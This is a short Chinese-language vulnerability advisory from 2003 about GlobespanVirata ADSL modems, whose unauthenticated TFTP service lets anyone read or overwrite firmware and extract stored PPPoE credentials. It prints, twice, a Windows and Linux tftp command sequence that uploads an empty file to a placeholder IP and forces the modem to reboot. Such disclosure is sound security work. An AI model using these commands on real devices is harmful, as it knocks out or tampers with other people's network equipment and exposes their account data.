GlobespanVirata ADSL 远程升级服务攻击漏洞
GlobespanVirata ADSL 远程升级服务攻击漏洞
信息提供: | 安全公告或线索)提供热线:51cto.editor@gmail.com |
漏洞类别: | 设计错误 |
攻击类型: | 远程进入系统 |
发布日期: | 2003-02-28 |
更新日期: | 2003-03-03 |
受影响系统: | GlobespanVirata ADSL TFTPD |
安全系统: | 无 |
漏洞报告人: | jlwhc nsfocus@163.com) |
漏洞描述: | GlobespanVirata ADSL是一款家用ADSL适配器,本身具有路由,防火墙,虚拟拨号等众多功能,支持远程TFTP对FIRMWARE软体升级。 由于GlobespanVirata ADSL的TFTPD不存在安全验证机制,导致任何网络用户可以对ADSL适配器非法上传或者下载FIRMWARE的内部数据包括内部敏感信息,比如PPPOE帐号)。 攻击者可以远程利用TFTPD软件对ADSL适配器发送请求实现攻击。 WIN2000下 ------------------------------------- c:\echo > null.rom tftp -i xxx.xxx.xxx.xxx put null.rom ------------------------------------- LINUX下 firewall# echo > null.rom tftp xxx.xxx.xxx put null.rom ------------------------------------- ADSL MODEM将自动重新启动 |
测试方法: | 警 告 WIN2000下 ------------------------------------- c:\echo > null.rom tftp -i xxx.xxx.xxx.xxx put null.rom ------------------------------------- LINUX下 firewall# echo > null.rom tftp xxx.xxx.xxx put null.rom ------------------------------------- ADSL MODEM将自动重新启动 |
解决方法: | 厂商补丁: GlobespanVirata --------------- 目前厂商还没有提供补丁或者升级程序,我们建议使用此软件的用户随时关注厂商的主页以获取最新版本: http://www.globespan.net |
评论暂时关闭